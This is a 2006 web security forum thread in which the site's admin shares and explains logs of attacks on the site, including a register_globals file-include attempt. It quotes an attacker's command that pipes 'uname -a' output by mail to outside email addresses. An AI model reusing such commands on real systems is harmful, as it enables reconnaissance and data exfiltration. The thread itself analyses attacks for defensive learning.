Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Some fun
Posted by: id
Date: September 12, 2006 01:46PM

I'm not sure if anyone is interested, but we get lots of bots, assholes, hax0rs attacking this site every day, and I figured I'd go ahead and post some of the logs from the ones attacking via http.

For some of you what is going on will be obvious, but for others you may learn a thing or two. See if you can figure out what is going on... (not really a contest, but just have fun with it)

Here is the first one, enjoy.

-id

Options: ReplyQuote
Re: Some fun
Date: September 12, 2006 05:12PM

Register globals to rewrite system globals, for poorly configured versions of PHP and poorly written scripts. People are still (attempt to) exploit this thing? :-/ Not sure what to make of the email addresses...

Options: ReplyQuote
Re: Some fun
Posted by: id
Date: September 12, 2006 06:11PM

uname -a | mail -s uname_i2_69.12.144.66 kkparole@yahoo.com

he is piping the output of uname with the subject of uname_i2_69.12.144.66 and sending it to kkparole@yahoo.com;

same with
uname -a | mail -s uname_i2_69.12.144.66 michaelroul@yahoo.com;

-id



Edited 1 time(s). Last edit at 09/12/2006 06:16PM by id.

Options: ReplyQuote
Re: Some fun
Posted by: id
Date: September 12, 2006 06:14PM

the file he tries to overwrite index.php with is here: http://sla.ckers.org/files/cm.txt

use the xxs cheat sheet to decode it if you don't feel like doing it by hand... http://ha.ckers.org/xss.html

-id



Edited 1 time(s). Last edit at 09/12/2006 06:18PM by id.

Options: ReplyQuote
Re: Some fun
Date: September 12, 2006 06:29PM

id Wrote:
-------------------------------------------------------
> the file he tries to overwrite index.php with is
> here: http://sla.ckers.org/files/cm.txt
>
> use the xxs cheat sheet to decode it if you don't
> feel like doing it by hand...
> http://ha.ckers.org/xss.html
>
> -id


I get hit with that one a lot. My original PHP content script just loaded up files I told it to so I got owned. I ended up rewriting it to make sure the file exists, but other than that I have very limited knowledge of PHP.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: Some fun
Posted by: merliin
Date: September 19, 2006 03:03PM

<brainfart>where's my delete post button again</brainfart>



Edited 1 time(s). Last edit at 09/19/2006 03:25PM by merliin.

Options: ReplyQuote
Re: Some fun
Posted by: id
Date: September 19, 2006 05:32PM

no brainfarting on our forums!

is anyone interested in more logs with crap in them, or is this just old hat to everyone??

-id

Options: ReplyQuote
Re: Some fun
Posted by: raif
Date: September 19, 2006 07:18PM

i'm definitely interested in more logs since i'm fairly new to web app security. keep em coming ;)



Edited 1 time(s). Last edit at 09/19/2006 07:21PM by raif.

Options: ReplyQuote
Re: Some fun
Posted by: id
Date: September 20, 2006 02:23PM

good to hear, I'll try and post a couple a week.

-id

Options: ReplyQuote
Re: Some fun
Posted by: Kyran
Date: September 20, 2006 06:54PM

Sounds good id.

- Kyran

Options: ReplyQuote


Sorry, only registered users may post in this forum.